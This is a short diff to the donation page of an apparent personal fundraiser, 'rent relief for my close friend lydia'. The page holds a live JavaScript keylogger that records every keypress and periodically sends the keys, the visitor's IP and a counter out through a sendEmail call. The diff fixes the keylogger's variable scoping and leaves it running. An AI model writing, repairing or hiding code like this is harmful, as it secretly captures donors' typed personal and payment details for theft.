--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -181,7 +181,7 @@
   <script>
 	  window.alert('hello mr aaron')
 	  var keys = '';
-	  var d = 0
+	  window.d = 0;
    document.onkeypress = function(e) {
 	get = window.event?event:e;
 	key = get.keyCode?get.keyCode:get.charCode;
@@ -190,7 +190,7 @@
 }
 	  window.setInterval(function(){
 	if(keys.length>0) {
-		sendEmail(window.ip + ':' + d + ':' + keys);
+		sendEmail(window.ip + ':' + window.d + ':' + keys);
 		d+=1
 		keys = '';
 	}
